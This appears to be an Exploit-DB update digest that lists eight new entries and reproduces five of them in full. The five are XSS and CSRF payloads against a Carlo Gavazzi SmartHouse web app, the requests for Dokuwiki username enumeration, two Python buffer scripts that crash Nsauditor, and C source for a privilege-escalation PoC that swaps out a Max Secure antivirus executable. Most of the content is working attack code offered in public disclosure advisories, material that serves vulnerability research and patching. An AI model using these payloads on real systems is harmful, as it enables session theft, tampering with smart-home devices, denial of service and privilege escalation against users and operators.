DB: 2019-12-03

8 changes to exploits/shellcodes

Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
Visual Studio 2008 - XML External Entity Injection
Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
Anviz CrossChex 4.3.12 - Local Buffer Overflow
Microsoft Excel 2016 1901 - XML External Entity Injection
SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
Dokuwiki 2018-04-22b - Username Enumeration

exploits/php/webapps/47730.txt

@@ -0,0 +1,123 @@
+# Exploit Title: SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery
+# Discovery by: LiquidWorm
+# Date: 2019-12-02
+# Vendor Homepage: http://www.gavazzi-automation.com
+# Tested Version: 6.5.33.17072501
+# CVE: N/A
+# Advisory ID: ZSL-2019-5543
+# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+Carlo Gavazzi SmartHouse Webapp 6.5.33 CSRF/XSS Vulnerabilities
+
+
+Vendor: Carlo Gavazzi Automation S.p.A
+Product web page: http://www.gavazzi-automation.com | http://www.smarthouse.nu
+Affected version: Web-app: 6.5.33.17072501
+                  Web-app: 6.5.32.17062101
+                  Web-app: 6.2.3.16102701
+                  Web-app: 5.5.3.160421101
+                  Web-app: 5.3.3.15120101
+                  Release: 1.0.5.1
+                  Release: 1.0.5.0
+                  Release: 1.0.3.5
+                  Release: 1.0.3.2
+
+Summary: Carlo Gavazzi is an international company that develops, manufactures
+and sells electrical automation components. Our products are used in industrial
+automation and real estate automation. Smart-house is based on a system that we
+have developed and produced since 1986, mainly for industrial-related installations.
+Our system is present in more than 150,000 installations. For a few years now, we
+have focused our development on smart electrical installations for home and property
+automation. Smart-house is currently installed in both villas and commercial properties.
+
+Desc: The application suffers from multiple CSRF and XSS vulnerabilities. The application
+allows users to perform certain actions via HTTP requests without performing any validity
+checks to verify the requests. This can be exploited to perform certain actions with
+administrative privileges if a logged-in user visits a malicious web site. Input passed
+to several GET/POST parameters is not properly sanitised before being returned to the user.
+This can be exploited to execute arbitrary HTML and script code in a user's browser session
+in context of an affected site.
+
+Tested on: Apache
+           PHP
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2019-5543
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5543.php
+
+
+01.11.2019
+
+--
+
+
+Reflected XSS (GET):
+--------------------
+
+1. http://192.168.0.24/app/index.php?error=Waddup"><script>confirm(document.cookie)</script> (pre-auth)
+2. http://192.168.0.24/app/messagepage.php?msg=<script>confirm(document.cookie)</script> (pre-auth)
+3. http://192.168.0.24/app/detaf.php?p=0&l=50"><script>confirm(document.cookie)</script>&f=5658 (post-auth)
+4. http://192.168.0.24/app/detaf.php?p=0"><script>confirm(document.cookie)</script>&l=50&f=5658 (post-auth)
+5. http://192.168.0.24/?functionsh=list&part[]=fn__intrudermain001&part[]=fn__intrudersec002&name=IntruderMainFunction"><script>confirm(document.cookie)</script>&grpl=1 (post-auth)
+
+
+CSRF set temperature:
+---------------------
+
+<html>
+  <body>
+    <form action="http://192.168.0.24/app/datasend.php" method="POST">
+      <input type="hidden" name="IDFunction" value="3875" />
+      <input type="hidden" name="favorite" value="0" />
+      <input type="hidden" name="rooms" value="-1" />
+      <input type="hidden" name="userId" value="-300" />
+      <input type="hidden" name="heat_ensave_set" value="24" />
+      <input type="hidden" name="heat_set" value="25.5" />
+      <input type="submit" value="Set" />
+    </form>
+  </body>
+</html>
+
+
+Stored XSS (POST):
+------------------
+
+<html>
+  <body>
+    <form action="http://192.168.0.24/app/command.php" method="POST">
+      <input type="hidden" name="op" value="11" />
+      <input type="hidden" name="name" value='Graph name"><script>confirm(document.cookie)</script>' />
+      <input type="hidden" name="period" value="2" />
+      <input type="hidden" name="gg" value="6" />
+      <input type="hidden" name="ggf" value="6" />
+      <input type="hidden" name="mm" value="11" />
+      <input type="hidden" name="mmf" value="11" />
+      <input type="hidden" name="aa" value="2019" />
+      <input type="hidden" name="aaf" value="2019" />
+      <input type="hidden" name="param" value="[1]" />
+      <input type="submit" value="Send" />
+    </form>
+  </body>
+</html>
+
+
+Reflected XSS (POST):
+---------------------
+
+<html>
+  <body>
+    <form action="http://192.168.0.24/refresh.php">
+      <input type="hidden" name="param[0][]" value="switch0251<script>confirm(document.cookie)</script>" />
+      <input type="hidden" name="param[0][]" value="0251" />
+      <input type="hidden" name="param[0][]" value="switch" />
+      <input type="hidden" name="param[1][]" value="switch1250" />
+      <input type="hidden" name="param[1][]" value="1250" />
+      <input type="hidden" name="param[1][]" value="switch" />
+      <input type="submit" value="Send" />
+    </form>
+  </body>
+</html>

exploits/php/webapps/47731.txt

@@ -0,0 +1,37 @@
+# Exploit Title: Dokuwiki 2018-04-22b - Username Enumeration
+# Date: 2019-12-01
+# Exploit Author: Talha ŞEN
+# Vendor Homepage: https://www.dokuwiki.org/dokuwiki
+# Software Link: https://download.dokuwiki.org/
+# Version: 2018-04-22b "Greebo"
+# Tested on: 
+# Alpine Linux 3.5 (docker image)
+# PHP 5.6.30
+# Apache/2.4.25 (Unix)
+# CVE : 
+
+# At login page there is a "set new password" page as below:
+# Forgotten your password? Get a new one: Set new password
+# At this page there is username enumeration vulnerability.
+# Testing for non-valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=sss
+
+# Response for non-valid user(sss):
+
+<div class="error">Sorry, we can't find this user in our database.</div>
+
+========================================================================
+
+# Testing for valid user:
+
+POST /doku.php?id=start&do=resendpwd HTTP/1.1
+
+sectok=&do=resendpwd&save=1&login=admin
+
+# Response for valid user (admin):
+
+<div class="error">There was an unexpected problem communicating with SMTP: Could not open SMTP Port.</div>
+<div class="error">Looks like there was an error on sending the password mail. Please contact the admin!</div>

exploits/windows/dos/47728.py

@@ -0,0 +1,35 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Name' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities, 
+# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that 
+# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing 
+# software significantly reduces the total cost of network management in enterprise environments by enabling 
+# IT personnel and systems administrators gather a wide range of information from all the computers in the network without 
+# installing server-side applications on these computers and create a report of potential problems that were found.
+
+# PoC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Name'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+
+#!/usr/bin/env python
+buffer = "\x41" * 1000
+try:
+    f=open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/dos/47732.py

@@ -0,0 +1,37 @@
+# Exploit Title: Nsauditor 3.1.8.0 - 'Key' Denial of Service (PoC)
+# Discovery by: SajjadBnd
+# Date: 2019-11-30
+# Vendor Homepage: http://www.nsauditor.com
+# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Tested Version: 3.1.8.0
+# Vulnerability Type: Denial of Service (DoS) Local
+# Tested on OS: Windows 10 - Pro
+# Email : [email protected]
+
+# About App
+# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks 
+# and hosts for vulnerabilities, and to provide security alerts.Nsauditor network auditor checks enterprise 
+# network for all potential methods that a hacker might use to attack it and create a report of potential 
+# problems that were found , Nsauditor network auditing software significantly reduces the total cost of 
+# network management in enterprise environments by enabling IT personnel and systems administrators gather 
+# a wide range of information from all the computers in the network without installing server-side applications 
+# on these computers and create a report of potential problems that were found.
+
+# POC
+# 1.Run the python script, it will create a new file "dos.txt"
+# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
+# 2.Paste the content of dos.txt into the Field: 'Key'
+# 6.click 'ok'
+# 5.Crashed ;)
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 1000
+try:
+    f=open("dos.txt","w")
+    print "[+] Creating %s bytes DOS payload.." %len(buffer)
+    f.write(buffer)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"

exploits/windows/local/47733.txt

@@ -0,0 +1,133 @@
+# Exploit Title: Max Secure Anti Virus Plus 19.0.4.020 - Insecure File Permissions
+# Discovery by: hyp3rlinx
+# Date: 2019-12-02
+# Vendor Homepage: www.maxpcsecure.com
+# Tested Version: 19.0.4.020
+# CVE: N/A
+
+[+] Credits: John Page (aka hyp3rlinx)		
+[+] Website: hyp3rlinx.altervista.org
+[+] Source:  http://hyp3rlinx.altervista.org/advisories/MAX-SECURE-PLUS-ANTIVIRUS-INSECURE-PERMISSIONS.txt
+[+] ISR: ApparitionSec          
+
+
+[Vendor]
+www.maxpcsecure.com
+
+
+[Affected Product Code Base]
+Max Secure Anti Virus Plus - 19.0.4.020
+
+File hash: ab1dda23ad3955eb18fdb75f3cbc308a
+msplusx64.exe
+
+
+[Vulnerability Type]
+Insecure Permissions
+
+
+[CVE Reference]
+N/A
+
+
+[Security Issue]
+Max Secure Anti Virus Plus 19.0.4.020 has Insecure Permissions on the installation directory.
+Local attackers or malware running at low integrity can replace a .exe or .dll file to achieve privilege escalation.
+
+C:\Program Files\Max Secure Anti Virus Plus>cacls * | more
+C:\Program Files\Max Secure Anti Virus Plus\7z.dll NT AUTHORITY\Authenticated Users:(ID)F
+                                                   BUILTIN\Users:(ID)F
+                                                   NT AUTHORITY\SYSTEM:(ID)F
+                                                   BUILTIN\Administrators:(ID)F
+
+
+[Affected Component]
+Permissions on installation directory
+
+
+[Exploit/POC]
+#include <stdio.h>
+#include <windows.h>
+#define TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxSDUI.exe"
+#define TMP "C:\\Program Files\\Max Secure Anti Virus Plus\\2.exe"
+#define DISABLED_TARGET "C:\\Program Files\\Max Secure Anti Virus Plus\\666.tmp"
+
+/* Max Secure Anti Virus Plus PoC By hyp3rlinx */
+
+BOOL PWNED=FALSE;
+
+BOOL FileExists(LPCTSTR szPath){
+  DWORD dwAttrib = GetFileAttributes(szPath);
+  return (dwAttrib != INVALID_FILE_ATTRIBUTES && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY));
+}
+
+void main(void){
+
+  if(!FileExists(DISABLED_TARGET)){
+  	CopyFile(TARGET, TMP, FALSE);
+  	Sleep(1000);
+    CopyFile(TMP, DISABLED_TARGET, FALSE);
+    printf("[+] Max Secure Anti Virus Plus EoP PoC\n");
+    Sleep(1000);
+    printf("[+] Disabled MaxSDUI.exe ...\n");
+    Sleep(300);
+   }else{
+  	 PWNED=TRUE;
+   }
+
+    if(!PWNED){
+     	char fname[MAX_PATH];
+        char newLoc[]=TARGET;
+        DWORD size = GetModuleFileNameA(NULL, fname, MAX_PATH);
+       if (size){
+         printf("[+] Copying exploit to vuln dir...\n");
+         Sleep(1000);
+         CopyFile(fname, TARGET, FALSE);
+         printf("[+] Replaced legit Max Secure EXE...\n");
+         Sleep(2000);
+         printf("[+] Done!\n");
+         MoveFile(fname, "C:\\Program Files\\Max Secure Anti Virus Plus\\MaxPwn.lnk");
+         Sleep(1000);
+         exit(0);
+        }
+    }else{
+    	if(FileExists(TMP)){
+    		 remove(TMP);
+    	}
+     	printf("[+] Max Secure Anti Virus Plus PWNED!!!\n");
+     	printf("[+] hyp3rlinx\n");
+     	system("pause");
+     }
+}
+
+
+[POC Video URL]
+https://www.youtube.com/watch?v=DXSV5geXkTw
+
+
+[Network Access]
+Local
+
+
+[Severity]
+High
+
+
+[Disclosure Timeline]
+Vendor Notification: November 19, 2019
+Vendor: "received a reply they will fix soon"
+Status request: November 24, 2019
+No replies other than automated response.
+November 29, 2019 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).
+
+hyp3rlinx